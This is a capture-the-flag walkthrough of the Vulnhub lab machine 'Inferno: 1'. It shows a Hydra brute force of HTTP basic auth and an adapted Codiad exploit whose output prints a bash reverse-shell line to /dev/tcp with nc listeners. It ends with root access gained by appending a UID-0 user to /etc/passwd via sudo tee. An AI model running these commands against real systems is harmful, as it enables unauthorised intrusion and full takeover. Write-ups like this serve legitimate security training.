Vulnhub - INFERNO: 1
Introduction
Real Life machine vs CTF.
Midway upon the journey of our life I found myself within a forest dark,
For the straightforward pathway had been lost.
Ah me! how hard a thing it is to say
What was this forest savage, rough, and stern,
Which in the very thought renews the fear.
Sidenote: the quote above is from Inferno, Canto I by Dante Alighieri, part of the Divine Comedy. As I read it, it is basically the same as the introduction to one of my favourite Alkaline Trio songs, I Found Away:
Midway on our life’s journey, I found myself
In dark woods, the right road lost. To tell
About those woods is hard - so tangled and rough
And savage that thinking of it now, I feel
The old fear stirring….
This is Inferno: 1 from Vulnhub.
Ports
This box was using port spoofing and reported having 1147 open ports. Yuck. I assumed there was a website; there was.
HTTP
It doesn’t take much gobusting to find our target; the directory we want is /inferno/. It’s protected by basic authentication, but we can Hydra that:
root@kali:/opt/vulnhub/inferno# hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 192.168.1.152 http-get /inferno/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-04 05:21:35
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.1.152:80/inferno/
[STATUS] 8009.00 tries/min, 8009 tries in 00:01h, 14336390 to do in 29:51h, 16 active
[80][http-get] host: 192.168.1.152 login: admin password: dante1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-04 05:23:29Codiad
The site is running Codiad, a sort of in browser IDE that I hadn’t seen before. It looks pretty neat but it’s now unmaintained and there is an exploit available.
I had to make a few changes to the exploit code it get it running, which was mostly adding the basic authentication header to the network calls; there were three of them. As an example, this is what the get_write_able_path function became:
def get_write_able_path(domain):
global session
url = domain + "/components/project/controller.php?action=get_current"
headers = {
"Authorization": "Basic YWRtaW46ZGFudGUx"
}
response = session.get(url, verify=False, headers=headers)
content = response.content
print "[+] Path Content : %s" % (content)
json_obj = json.loads(content)
# print(json_obj) # debug
if json_obj['status'] == "success":
return json_obj['data']['path']
else:
return FalseAnd once the code modifications were made, we could get a shell:
root@kali:/opt/vulnhub/inferno# ./exploit.py http://192.168.1.152/inferno admin dante1 192.168.1.150 1234 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/192.168.1.150/1235 0>&1 2>&1"' | nc -lnvp 1234
nc -lnvp 1235
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"inferno","path":"\/var\/www\/html\/inferno"}}
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...
http://192.168.1.152/inferno/components/filemanager/controller.php?type=1&action=search&path=/var/www/html/infernoShell
After that I was on the box as www-data, and we only had one user with a home directory - dante. He’s got a file we can read:
www-data@Inferno:/home/dante/Downloads$ file download.dat
file download.dat
download.dat: ASCII text, with very long lines, with no line terminators
4.0K -rw-r--r-- 1 www-data www-data 1.5K Nov 3 11:52 download.datThis is a space-delimited hex encoded file that contains some verse, and some creds:
dante:V1rg1l10h3lpm3
SSH + Privesc
Remember the port spoofing and how I got lucky with the webserver on port 80? Well, SSH was on the standard port too, and dante had sudo access to tee. tee reads from standard input and writes to a file, so I added my favourite root2 user with the password mrcake to /etc/passwd. This is slightly different to what GTFOBins suggested, but the concept is the same. Enjoy:
root@kali:/opt/vulnhub/inferno# ssh dante@192.168.1.152
The authenticity of host '192.168.1.152 (192.168.1.152)' cant be established.
ECDSA key fingerprint is SHA256:5eMSIG2JrA2xEfQlgC7P3KruDMWuL5zBOhcYqj1nefg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.152' (ECDSA) to the list of known hosts.
dante@192.168.1.152 password:
Linux Inferno 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Nov 17 07:45:38 2020 from 10.1.3.27
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dante may run the following commands on Inferno:
(root) NOPASSWD: /bin/tee
dante@Inferno:~$ sudo -u root /bin/tee -a /etc/passwd
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
dante@Inferno:~$ su root2
Password:
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
proof.txt
root@Inferno:~# cat proof.txt
ASCII ART REMOVED
Congrats!
Youve rooted Inferno!Thanks mindsflee.